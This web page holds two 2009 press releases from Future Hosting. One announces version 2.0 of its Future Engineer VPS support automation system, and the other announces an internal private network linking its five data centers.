Future Hosting is the developer of Future Engineer™,  a technical support automation system designed to automate time consuming server configuration and repair tasks on Virtual Private Servers (VPS), Future Engineer™ allows clients to receive a greater level of technical support than is available when technicians spend their time performing routine or basic maintenance tasks. With Future Engineer™, technicians are free to spend their time offering a level of technical support that is unrivaled and otherwise unaffordable.

For more information about Future Hosting, please visit http://www.futurehosting.com.

About Future Hosting, LLC
Founded in 2001, Future Hosting is a privately held leading Internet solutions provider specializing in managed hosting, including both Dedicated Servers and Virtual Private Servers. The company has built a strong reputation for its high-quality service, innovative pricing models, and 3-hour Service Level Agreement. Future Hosting is based in Novi, Mich.

Future Hosting Upgrades Technical Support with Launch of Future Engineer™ 2.0

NOVI, Mich. (June 29, 2009) – Future Hosting (http://www.futurehosting.com), an Internet solutions provider serving SMBs and enterprises internationally, today announced the launch of Future Engineer™ 2.0, marking a significant upgrade and expansion of its exclusive, award-winning technical support automation technology for managing Virtual Private Servers.

Future Engineer™ 2.0 introduces an array of proactive security and monitoring improvements, enabling the technology to be more seamlessly deployed and more effective at minimizing security risks. Namely, the new version includes significantly enhanced external vulnerability scanning capabilities and extensive new security controls installed upon account provisioning.

Designed to automate time consuming server configuration and repair tasks on Virtual Private Servers (VPS), Future Engineer™ allows customers to receive a greater level of technical support than is available when technicians spend their time performing routine or basic maintenance tasks. With Future Engineer™, technicians are free to spend their time offering a level of technical support that is unrivaled and otherwise unaffordable.

The new version of Future Engineer™ also includes the necessary tools for greater customer interaction in the server hardening process. Customers now receive more frequent, detailed and comprehensive summaries of the latest security threats and available software upgrades.  What’s more, customers now have the ability to manually approve certain upgrades that cannot be performed without consent due to potential capability issues; in these cases, Future Engineer™ automatically perform upgrades which can be automated once approved. Those that cannot be automated will be manually completed by technicians.

“Future Engineer™ has helped distinguish Future Hosting as an innovative company committed to improving customer service. Nearly a year and a half after we first launched this pioneering support automation system, the second major iteration of Future Engineer™ is a welcome improvement with exciting capabilities,” said Vik Patel, Future Hosting CEO.

Future Hosting Deploys Internal Private Network Connecting Five International Data Centers

This service has been depreciated.

NOVI, Mich. (April 1, 2009) – Future Hosting (http://www.futurehosting.com), an Internet solutions provider serving SMBs and enterprises internationally and the developer of Future Engineer™, announced today it has deployed an internal private network between its five international data center facilities, in Chicago, Ill.; Dallas, Texas; Seattle, Wash.; Washington, D.C.; and London, England.

The internal network is connected to all Future Hosting servers through physically separate network cards installed alongside network cards used for Internet connectivity. Each server’s private network card is assigned a private IP address that allows Future Hosting servers to communicate with each other on the internal network.


Click here for Support

Title:
Description: